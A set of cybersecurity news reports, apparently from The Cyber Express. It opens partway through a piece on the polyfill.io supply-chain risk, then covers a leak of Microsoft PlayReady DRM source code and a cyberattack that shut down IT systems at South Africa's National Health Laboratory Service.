The concerns are that any website embedding a link to the original polyfill.io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack. Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."

This incident serves as a stark reminder of the security implications of relying on external code libraries/third-party scripts and the importance of vigilance in maintaining website integrity, plus the potential malicious takeover of massively deployed projects. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A Microsoft software engineer accidentally published internal PlayReady DRM source code on a publicly accessible developer forum. The 4GB data leak contains sufficient information to compile the required DLL from the source code, potentially opening the door for reverse engineering or cracking of the DRM protection technology. PlayReady, introduced in 2007, is Microsoft's platform-independent digital rights management (DRM) system used for protecting media files. It includes encryption, output protection, and digital rights management features. The leak could have significant implications for the security of this widely-used technology.

PlayReady DRM Internal Code Leak

In early June, a Microsoft engineer had published information about an Apple TV service crash on a Surface Pro 9 device in a public forum. The shared data included a 771MB file attachment that revealed 4GB of internal code related to Microsoft PlayReady upon extraction. [caption id="attachment_79066" align="alignnone" width="1920"] Original Post Before Deletion (Source: security-explorations.com)[/caption] The leaked PlayReady data is said to include: 1. WarBird configurations for creating the PlayReady library 2. WarBird libraries for code obfuscation functions 3. Libraries with symbolic information related to PlayReady [caption id="attachment_79063" align="alignnone" width="1428"] Partial Directory View of Leaked Data (Source: security-explorations.com)[/caption]

HD Keys Could Be Decrypted

Researchers from cybersecurity company AG Security Research Lab managed to successfully build the required Windows PlayReady DLL library from the leaked internal code, aided by step-by-step instructions provided by another user on the same forum. Their investigation uncovered several deficiencies in Protected Media Path (PMP) components of PlayReady, which could be exploited to access plaintext content keys secured by the system on Windows 10 and 11 systems. The researchers demonstrated that these extracted keys could successfully decrypt high-definition movies protected by PlayReady. Notably, the vulnerability persists even on systems with hardware DRM capabilities, as this feature can be easily disabled. The root cause appears to lie in the software DRM implementation used by default on Windows 10 systems without hardware DRM capability. Given that Windows 10 still holds a 69% market share worldwide, this vulnerability could potentially affect a significant number of users until the operating system's retirement in October 2025. The team also demonstrated that the technique used to extract plaintext values of content keys could work for other platforms relying on SW Microsoft PlayReady technology in a Windows OS environment.

Implications and Microsoft's Response

The researchers had notified Microsoft about the leak on June 12, 2024. While Microsoft removed the forum post within 12 hours, the download link reportedly remained active. On June 26, MSRC stated to the researchers that it had conducted an investigation and determined that the incident was not a vulnerability to service as the post had already been taken down. The researchers confirmed that the download link no longer remains active. The incident highlights the ongoing challenges in maintaining the security and secrecy of DRM implementations. It also underscores the importance of adhering to guidelines for handling sensitive information in public forums, as the leak violated Microsoft's own guidelines for posting link reproduction information publicly. These guidelines specify:

• All information in reports and any comments and replies are publicly visible by default.
• Don't put anything you want to keep private in the title or content of the initial report, which is public.
• To maintain your privacy and keep your sensitive information out of public view, exercise caution.

Major Streaming Services Potentially Affected

The same research team had earlier tested Microsoft's Protected Media Path and had discovered several streaming platforms were affected by vulnerabilities within the environment: Canal+ Online, Netflix, HBO Max, Amazon Prime Video, Sky Showtime, and others. DRM protection is crucial to the video streaming industry, which is valued at $544 billion, making this security breach a matter of serious concern. Microsoft reportedly demonstrated interest in a full disclosure of the stated vulnerabilities and technical details along with Proof of Concept over its MSRC channel, offering potential rewards for the disclosure. However, the researchers declined, as they felt a full disclosure would have to include a commercial agreement, would jeopardize their own confidential technology and tools along with future research on the Windows operating system. The researchers also believed that Microsoft should focus on conducting a more comprehensive review of its Protected Media Path environment, which could result in the discovery and fixing of additional issues rather than focusing on a single exploit.   Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The National Health Laboratory Service (NHLS), South Africa's primary diagnostic pathology service for public healthcare facilities, has fallen victim to a cyber attack. The incident, which occurred over the weekend, has forced the organization to shut down its IT systems, including emails, website, and patient lab test results storage and retrieval systems. NHLS CEO Prof Koleka Mlisana confirmed the breach in a memo to staff, describing it as a "suspected incident" that compromised the security of their IT infrastructure. The attack comes amidst an Mpox outbreak that has already overwhelmed the country's healthcare services. However, the extent of the cyberattack has yet to be determined, even as restoration efforts are underway.

Impact on South Africa's National Health Laboratory Service

NHLS Chief Executive Officer Prof Koleka Mlisana informed staff of the incident in a memo, stating that the breach had caused damage and that the organization was treating the matter with extreme urgency and concern. Milsana stated, “I regret to inform you that our IT systems are unavailable due to a suspected incident that occurred over the weekend.” Mlisana assured staff that the organization's Incident Response Team was working around the clock to determine the scope of the intrusion and deploy the necessary safeguards to secure systems and data. The NHLS has implemented its "Downtime Protocol" to minimize disruption to services, prioritizing patients' samples and processing, with results communicated directly to clinicians whenever urgent. The cyber attack comes at a critical time for South Africa's healthcare system. The country is currently grappling with a Mpox outbreak, and the NHLS was already facing a significant backlog in toxicology tests as of March. The shutdown of IT systems is likely to exacerbate these challenges. Mzi Gcukumana, the NHLS Communication, Marketing, and PR officer, disclosed: “Preliminary investigation suggests that our Enterprise Resource Planning (Oracle) environment, Laboratory Information System (LIS) (TrakCare) database, and CDW are not affected. Therefore, no patient data has been lost or compromised. All patient data is safe."

Response and Recovery Efforts

“Please rest assured that our priority focus is on data security. We are determined to solve this issue swiftly and transparently,” Milsana stated to patients. In response to the breach, the NHLS has deployed its Incident Response Team to assess the scope of the intrusion and implement necessary safeguards. Mlisana assured staff that the team is working around the clock to secure systems and data. “I want to take this opportunity to thank you in advance as we all put in our efforts to ensure that disruption to our services is minimised,” Milsana added. The NHLS had determined that that certain sections of its systems, including its backup server were deleted, requiring the rebuilding of affected systems. Gcukumana stated, “All users will be aware that the NHLS networked laboratory system is heavily reliant on these information technology systems that have been disrupted.” He added, “Unfortunately, this will take time, and investigations thus far have not advanced enough for us to give a timeframe for the restoration of our systems and full service. All stakeholders and the public will be informed as soon as more information becomes available.” The National Department of Health, which oversees the NHLS, has been informed of the incident. A spokesperson for the department called for patience as efforts to resolve the issue continue. As the investigation unfolds, the NHLS has promised regular updates on the compromise and ongoing response activities. The organization emphasizes its commitment to data security and swift, transparent resolution of the issue. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.